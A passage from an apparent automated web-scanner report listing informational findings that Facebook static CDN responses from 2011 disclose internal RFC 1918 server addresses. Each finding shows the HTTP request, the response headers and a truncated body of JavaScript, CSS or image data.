GET /rsrc.php/v1/y6/r/yCyTimbRkBE.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 10 Aug 2011 18:27:55 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 16446
Vary: Accept-Encoding
Cache-Control: public, max-age=31109374
Expires: Thu, 09 Aug 2012 19:54:02 GMT
Date: Mon, 15 Aug 2011 18:24:28 GMT
Connection: close

/*1313006049,169775812*/

if (window.CavalryLogger) { CavalryLogger.start_js(["gYmo4"]); }

var ChatUserInfos=window.ChatUserInfos||{};
var FriendLists=window.FriendLists||{get:function(a){var b=Frien
...[SNIP]...

16.30. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y8/r/Dg8YLPWKyk7.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y8/r/Dg8YLPWKyk7.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 01 Apr 2011 15:54:26 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 581
Cache-Control: public, max-age=27850843
Expires: Tue, 03 Jul 2012 02:59:31 GMT
Date: Mon, 15 Aug 2011 18:38:48 GMT
Connection: close

/*1309748371,169776065*/

.uiVideoLink{background-color:#000;display:-moz-inline-box;display:inline-block;padding:4px 0;position:relative}
.uiVideoLink:hover{text-decoration:none}
.uiVideoLink i{backg
...[SNIP]...

16.31. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/dBNzZ9AtCWo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yB/r/dBNzZ9AtCWo.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yB/r/dBNzZ9AtCWo.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 02 Aug 2011 03:58:37 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 2617
Vary: Accept-Encoding
Cache-Control: public, max-age=30882837
Expires: Tue, 07 Aug 2012 05:12:46 GMT
Date: Mon, 15 Aug 2011 18:38:49 GMT
Connection: close

/*1312780464,169776319*/

if (window.CavalryLogger) { CavalryLogger.start_js(["ZtuLL"]); }

function EmuController(a,b){this.impression=b;this.containerId=a;DataStore.set($(a),'emuController',this);re
...[SNIP]...

16.32. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/gvrW9GGxv2y.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yB/r/gvrW9GGxv2y.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yB/r/gvrW9GGxv2y.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: static.ak.fbcdn.net

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 08 Aug 2011 04:07:12 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Content-Length: 18700
Vary: Accept-Encoding
Cache-Control: public, max-age=30882992
Expires: Tue, 07 Aug 2012 05:14:45 GMT
Date: Mon, 15 Aug 2011 18:38:13 GMT
Connection: close

/*1312780490,169776320*/

form{margin:0;padding:0}
label{cursor:pointer;color:#666;font-weight:bold;vertical-align:middle}
label input{font-weight:normal}
textarea,.inputtext,.inputpassword{border:1px
...[SNIP]...

16.33. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/mD1E478qJLC.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yD/r/mD1E478qJLC.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yD/r/mD1E478qJLC.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: static.ak.fbcdn.net

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 08 Aug 2011 03:04:40 GMT
X-FB-Server: 10.138.16.185
Content-Length: 2568
Vary: Accept-Encoding
Cache-Control: public, max-age=30882968
Expires: Tue, 07 Aug 2012 05:14:22 GMT
Date: Mon, 15 Aug 2011 18:38:14 GMT
Connection: close

.PNG
.
...IHDR.............g.......PLTE......RRRVp....]cp.h.wwwRRRRRRRRRRRRRRRRRRRRRRRRwww......;Y.wwwVp.wwwwwwVp.]cp.h.Vp.Vp.www]cp]cpwww]cp]cpwww]cpwww]cpWq.Vp.]cp]cpwww]cpVp.Vp.Vp.Ys.c{....]cpVp.
...[SNIP]...

16.34. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/0k5dcVwtJQr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yH/r/0k5dcVwtJQr.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yH/r/0k5dcVwtJQr.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 09 Aug 2011 01:15:11 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 97406
Vary: Accept-Encoding
Cache-Control: public, max-age=30959287
Expires: Wed, 08 Aug 2012 02:27:31 GMT
Date: Mon, 15 Aug 2011 18:39:24 GMT
Connection: close

/*1312856802,169776321*/

if (window.CavalryLogger) { CavalryLogger.start_js(["VfnZ3"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

16.35. http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/LzAFHbTKrbn.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yM/r/LzAFHbTKrbn.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yM/r/LzAFHbTKrbn.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 05 Aug 2011 20:58:05 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 1609
Vary: Accept-Encoding
Cache-Control: public, max-age=30882962
Expires: Tue, 07 Aug 2012 05:14:51 GMT
Date: Mon, 15 Aug 2011 18:38:49 GMT
Connection: close

/*1312780514,169775556*/

if (window.CavalryLogger) { CavalryLogger.start_js(["w8uzH"]); }

function AlbumScroller(){}AlbumScroller.prototype={init:function(d,e){this.photoGroups={};this.scrollListene
...[SNIP]...

16.36. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/OpolsLVhFVH.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yO/r/OpolsLVhFVH.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yO/r/OpolsLVhFVH.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 10 Aug 2011 18:27:55 GMT
X-FB-Server: 10.138.64.183
Content-Length: 16487
Vary: Accept-Encoding
Cache-Control: public, max-age=31110310
Expires: Thu, 09 Aug 2012 20:25:08 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

/*1313007908,176832695*/

if (window.CavalryLogger) { CavalryLogger.start_js(["gYmo4"]); }

var ChatUserInfos=window.ChatUserInfos||{};
var FriendLists=window.FriendLists||{get:function(a){var b=Frien
...[SNIP]...

16.37. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/WR6YXci7s1F.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yQ/r/WR6YXci7s1F.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yQ/r/WR6YXci7s1F.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Sat, 23 Jul 2011 20:46:54 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 529
Cache-Control: public, max-age=29661423
Expires: Tue, 24 Jul 2012 01:41:30 GMT
Date: Mon, 15 Aug 2011 18:24:27 GMT
Connection: close

/*1311558175,169775557*/

.showOtherMasher:hover{background-color:#edeff4;cursor:pointer}
.showOtherMasher a{display:block;padding-bottom:8px;padding-top:6px}
.showOtherMasher:hover a{text-decoration:
...[SNIP]...

16.38. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/foOlSPGxMgD.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yQ/r/foOlSPGxMgD.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yQ/r/foOlSPGxMgD.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 08 Aug 2011 04:09:23 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 1502
Vary: Accept-Encoding
Cache-Control: public, max-age=30883800
Expires: Tue, 07 Aug 2012 05:14:22 GMT
Date: Mon, 15 Aug 2011 18:24:22 GMT
Connection: close

/*1312780470,169776066*/

.event_profile .event_upload_image{width:179px}
.event_profile #rsvp_form{display:inline}
.event_profile .event_guestlist .uiHeaderNav{margin-left:0}
.event_profile .event_gu
...[SNIP]...

16.39. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/H9GMoKDdPbt.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yW/r/H9GMoKDdPbt.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yW/r/H9GMoKDdPbt.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 01 Aug 2011 02:32:07 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 3551
Vary: Accept-Encoding
Cache-Control: public, max-age=30269821
Expires: Tue, 31 Jul 2012 02:55:49 GMT
Date: Mon, 15 Aug 2011 18:38:48 GMT
Connection: close

/*1312167199,169776066*/

.bulkTaggerTypeahead{width:210px}
.bulk_tagger_body .bulkTagIcon{margin-top:6px;margin-right:7px}
.bulk_tagger_body .bulkTagStatus{display:inline-block;padding-top:4px}
.bulk
...[SNIP]...

16.40. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/1xbEnWOvBF3.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y_/r/1xbEnWOvBF3.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y_/r/1xbEnWOvBF3.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=a.206519616063696.51681.146642365384755
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 02 Aug 2011 22:38:35 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 6345
Vary: Accept-Encoding
Cache-Control: public, max-age=30882916
Expires: Tue, 07 Aug 2012 05:14:34 GMT
Date: Mon, 15 Aug 2011 18:39:18 GMT
Connection: close

/*1312780474,169775555*/

if (window.CavalryLogger) { CavalryLogger.start_js(["6\/rff"]); }

add_properties('Hovercard',{ARROW_LEFT_OFFSET:32,RESERVED_WIDTH:297,RESERVED_HEIGHT:237,cache:{},lastEndpoi
...[SNIP]...

16.41. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yb/r/GsNJNwuI-UM.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yb/r/GsNJNwuI-UM.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: static.ak.fbcdn.net

Response

HTTP/1.1 200 OK
Content-Length: 522
Content-Type: image/gif
Last-Modified: Wed, 02 Mar 2011 04:41:49 GMT
X-FB-Server: 10.138.69.183
Cache-Control: public, max-age=20255959
Expires: Fri, 06 Apr 2012 05:19:27 GMT
Date: Mon, 15 Aug 2011 18:40:08 GMT
Connection: close

GIF89a.............p....................Ro...................!..NETSCAPE2.0.....!.......,..........+..I....e....)."-...%..g
.i..tio..~..0.......!..    ....,...........P.$........wIT..!..    ....,..........2
...[SNIP]...

16.42. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/iXI7kq8F8Uu.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yc/r/iXI7kq8F8Uu.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yc/r/iXI7kq8F8Uu.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=a.206519616063696.51681.146642365384755
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Wed, 13 Jul 2011 17:43:52 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 1300
Vary: Accept-Encoding
Cache-Control: public, max-age=29660220
Expires: Tue, 24 Jul 2012 01:35:54 GMT
Date: Mon, 15 Aug 2011 18:38:54 GMT
Connection: close

.PNG
.
...IHDR.......@.......-.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

16.43. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/72NZsnqjQ5t.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yd/r/72NZsnqjQ5t.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yd/r/72NZsnqjQ5t.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 11 Aug 2011 05:52:34 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 107065
Vary: Accept-Encoding
Cache-Control: public, max-age=31146124
Expires: Fri, 10 Aug 2012 06:06:33 GMT
Date: Mon, 15 Aug 2011 18:24:29 GMT
Connection: close

/*1313042746,169775813*/

if (window.CavalryLogger) { CavalryLogger.start_js(["MXIXm"]); }

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.l
...[SNIP]...

16.44. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/2p1GVwLpsud.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yf/r/2p1GVwLpsud.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yf/r/2p1GVwLpsud.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 08 Aug 2011 03:45:42 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 9609
Vary: Accept-Encoding
Cache-Control: public, max-age=30882923
Expires: Tue, 07 Aug 2012 05:14:12 GMT
Date: Mon, 15 Aug 2011 18:38:49 GMT
Connection: close

/*1312780497,169776317*/

.fbPhotosTheaterActions a{display:block;margin-bottom:5px}
.fbUndoSpamReport a.fbUndoSpam{display:inline;margin-bottom:0}
.fbPhotosTheaterActionsTag .taggingOn,
.taggingMode
...[SNIP]...

16.45. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/JKQSEcToESS.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yf/r/JKQSEcToESS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yf/r/JKQSEcToESS.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: static.ak.fbcdn.net

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 12 Aug 2011 20:02:09 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 35504
Vary: Accept-Encoding
Cache-Control: public, max-age=31282346
Expires: Sat, 11 Aug 2012 20:12:37 GMT
Date: Mon, 15 Aug 2011 18:40:11 GMT
Connection: close

/*1313179970,169776318*/

button.async_saving .default_message,
a.async_saving .default_message,
form.async_saving .default_message,
.saving_message{display:none}
.default_message,
button.async_saving
...[SNIP]...

16.46. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/TK1srIkMgP5.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yf/r/TK1srIkMgP5.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yf/r/TK1srIkMgP5.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 05 Aug 2011 18:28:19 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 3223
Vary: Accept-Encoding
Cache-Control: public, max-age=30884107
Expires: Tue, 07 Aug 2012 05:19:35 GMT
Date: Mon, 15 Aug 2011 18:24:28 GMT
Connection: close

/*1312780841,169776067*/

if (window.CavalryLogger) { CavalryLogger.start_js(["gL+LP"]); }

XdArbiter={handleMessage:function(b){try{var data=JSON.parse(b);if(!data.method)return;Arbiter.inform('Conne
...[SNIP]...

16.47. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/wQ6daFs36J_.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yh/r/wQ6daFs36J_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yh/r/wQ6daFs36J_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 11 Aug 2011 03:29:07 GMT
X-FB-Server: 10.138.64.183
Content-Length: 20479
Vary: Accept-Encoding
Cache-Control: public, max-age=31137662
Expires: Fri, 10 Aug 2012 03:45:27 GMT
Date: Mon, 15 Aug 2011 18:24:25 GMT
Connection: close

/*1313034328,176832695*/

.interaction_form div.dialog_content{border-width:0}
.interaction_dialog_body{border-bottom:1px solid #ccc}
.interaction_form_body{padding:0;border-bottom:none}
.interaction_
...[SNIP]...

16.48. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vIpx6O3T-P_.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yi/r/vIpx6O3T-P_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yi/r/vIpx6O3T-P_.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: static.ak.fbcdn.net

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 08 Aug 2011 04:10:24 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 12735
Vary: Accept-Encoding
Cache-Control: public, max-age=30882972
Expires: Tue, 07 Aug 2012 05:14:25 GMT
Date: Mon, 15 Aug 2011 18:38:13 GMT
Connection: close

/*1312780465,169776319*/

.sp_2sus5d{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/cCumLRsyHZl.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_b890
...[SNIP]...

16.49. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/BawGDULIRtU.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yk/r/BawGDULIRtU.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yk/r/BawGDULIRtU.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=a.206519616063696.51681.146642365384755
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 01 Aug 2011 02:31:37 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 1986
Vary: Accept-Encoding
Cache-Control: public, max-age=30269647
Expires: Tue, 31 Jul 2012 02:53:25 GMT
Date: Mon, 15 Aug 2011 18:39:18 GMT
Connection: close

